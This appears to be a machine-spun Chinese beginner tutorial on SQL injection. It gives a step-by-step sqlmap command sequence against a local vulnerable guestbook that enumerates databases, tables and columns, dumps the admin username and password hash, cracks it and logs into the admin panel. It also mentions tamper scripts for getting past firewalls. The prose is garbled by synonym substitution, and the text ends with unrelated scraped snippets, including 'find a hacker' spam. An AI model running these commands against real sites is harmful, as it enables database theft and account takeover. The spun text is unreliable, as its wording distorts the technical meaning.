我们在第二季之一篇文章内容里《新手Web渗透教程 之一课:数据库漏洞(SQL注入)环境搭建/测试》结构了一个mysql php留言本的系统漏洞自然环境,
大家就为此自然环境为例子来解读最时兴的SQL Injection(SQL引入),更好是你不要只看文章内容,请动着手把之一课的配备自然环境构建好。
数据库查询有很多种多样。在网上较为时兴而且获得广泛运用的有Oracle、MySQL、PostgreSQL、微软公司SQL Server、微软公司Access 、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等数据库查询智能管理系统。
可是不管哪样数据库查询,基础都逃离不上库、表、字段名、字段名值的定义。
举个品牌形象的形容,数据库查询便是一个仓库,杜兰特有很多屋子,每一个屋子都贴个标识,说明里面里存储哪些的,每一个屋子便是表了 。每一个屋子里又存在许多麻包,这种麻包上也写有姓名,标明是张三還是李四的麻包,那麼麻包便是字段名的含意了。开启张三的麻包,里面配有iPhone,iPhone便是字段名值。开启李四的麻包,里面配有水蜜桃,水蜜桃也是字段名值。我这里给新手画了个思维脑图。
主要是对于windos自然环境来解读,如果是linux自然环境,用SQL引入专用工具会更为的简易;不管哪些的自然环境?基本原理全是一样的,因而无须担忧;
1、python27,由于sqlmap必须python27适用;
下载链接:https://www.python.org/downloads/release/python-2714/
2、数据库查询引入专用工具“sqlmap”;下载链接:http://sqlmap.org/
免费下载完缓解压力全部文档到一个文件目录就可以了,如同缓解压力到d:/sqlmap。该专用工具用python語言写的,适用混合开发运作,具备一百多个命令行参数。你能安裝后,你也就会了系统软件和python自然环境配备。假如你能把握全部的主要参数后,我敢确信早已对最时兴的数据库查询引入进攻拥有非常深的了解了。Sqlmap是引入武器,拥有它你能丢掉全部引入专用工具了,它也是个撩妹高手,因为它基础适用了目前市面上全部数据库查询,而且引入的姿态(Payload)各形各色,给你目不暇接的。
3、假如你没想象我下面那般全相对路径启用sqlmap,请参照《黑客渗透入门教程 第二课:6行python代码写个端口扫描工具》本文配备好python27的环境变量。
假如你要想再懒点,我还能够教你一个简易的方式。假如你一直跟随我的课程学习培训,有可能你设备既配有python2.7,又配有python3.0,想立即启用python2.7实行sqlmap。我在这假定你的python27装在c:/python27,你的sqlmap缓解压力在d:/sqlmap,你能在cmd下边先实行一条指令就可以立即启用了,指令以下:
path=c:/python27;d:/sqlmap
默认设置装上的python2.7要是没有让你立即配备好环境变量,也没事儿,大家立即启用全相对路径就可以了。我在这假定你的python2.7装在c:/python2.7,你的sqlmap缓解压力在d:/sqlmap。
1、检验系统漏洞:
运作:
c:/python27/python.exe d:/sqlmap/sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2
或者你像我上文一样,先实行了:
path=c:/python27;d:/sqlmap
那麼立即实行下条指令就可以了。
sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2
-u主要参数是表明后面要跟随的网页链接(URL),假如后面的URL好像"1.php?id=2&name=3"里面有两个&标记的,在windows下请把URL用双引号造成来,假如在linux下倒是无需。回车键后,假如出現了解Y/n的,你一直按住回车键就可以了。按回车键就表明Y,键入n表示不同意。
不一会时间便会出現漏洞利用結果了。
一定要注意图中中,出現了二种漏洞利用結果。一种是AND/OR time-based blind表明是根据時间来分辨系统漏洞的,另一种是UNION query的。这二种后面都给你显示信息出了漏洞利用句子了。假如你对Sqlmap的漏洞利用句子有兴趣爱好,请去学习mysql数据库查询专业知识,掌握其基本原理。
2、用主要参数--dbs获得大家引入网址的全部库名;
运作:
c:/python27/python.exe d:/sqlmap/sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2 --dbs
假如只想要当今网址的当今库名,主要参数--dbs换为--current-db。
大家获得了4个数据库查询,information、mysql、perionmance、test实际上全是系统软件内置的库,并并不是留言本带的库,大家建的这一留言本默认设置用的是test的库;
3、用主要参数-D test --tables获得test杜兰特的全部表名;
运作:
c:/python27/python.exe d:/sqlmap/sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2 -D test --tables
大家获得了三个表名,有效的存在管理人员信息内容的表在manage_user。
4、用主要参数-D test -T manger-users --columns获得 数据库查询test中manger-users表中全部字段名;
运作:
c:/python27/python.exe d:/sqlmap/sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2 -D test -T manger-users --c
olumns
大家获得了user_name和user_pw的有效字段。
5、运作-D test -T manger-users -C user_name,user_pw --dump获得user-name和user_pw字段名里的值;
运作:
c:/python27/python.exe d:/sqlmap/sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2 -D test -T manger-users -C user_name,user_pw --dump
一定要注意图中中也有了解Y/n的,大致含意全是了解大家是不是要启用sqlmap全自动破译md5登陆密码的。大家并不一定,立即键入n。大家把获得的数据加密登陆密码去“www.cmd5.com"查寻就可以了,获得的結果密码是"123456"。
一定要注意我还在引入全过程中-D、-T、-C这三个库、表、字段名的主要参数全是用英文大写的,查寻結果无需。要查寻某一結果,主要参数前都用--的,像--tables。
这就是非常简单的最圆满的sqlmap的使用 *** 了。大家根据引入最后获得了留言本管理人员的登录名和登陆密码,大家立即开启“http://localhost/book/admin”就键入登录名和登陆密码就进到后台管理了。自然有的网址的后台管理会更名,大家必须一些后台管理漏洞扫描工具来寻找网址的后台管理,这留到大家之后的零基础Web渗入实例教程里。
从事SEO的朋友应该对黑帽这个词并不陌生,有的甚至嗤之以鼻,有的避而远之,包括小马前段时间写的《一个菜鸟SEOer对白帽和黑帽SEO的理性思考》,也倡导大家要做白帽SEO,总之各有见解,难道黑帽S...
很多状况下我们可以根据应用sqlmap中的tamper脚本制作来对总体目标开展更高效率的进攻。tamper脚本制作的功效是改动大家传出的恳求来避免其被WAF(网络技术应用服务器防火墙)阻拦。在一些状...
技术手机怎么找黑客 1、怎么找黑客exe是。技术手机成都接单就有点夸张了,该片在美国上映以后。41找黑客71。黑客而有些投资者图他的收益,很多程序员写一些可通过网络远程登录到其他pc的后台程序,什么合...
第一节、黑客的种类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入...
Burp Suite是什么? Burp Suite是一个服务平台,包括很多插口,目地是推动和加速进攻程序运行的全过程中不一样的专用工具。全部这种专用工具都是有同样的架构,displayong解决HT...
利用软件控制正规网站,然后植入自己客户的非法广告,借以躲避百度等搜索网站的封杀。近日,安徽省庐江县检察院以涉嫌非法控制计算机信息系统罪将张家恒、陈安、潘志刚三人提起公诉。 互联网上灰色产业催生黑客技...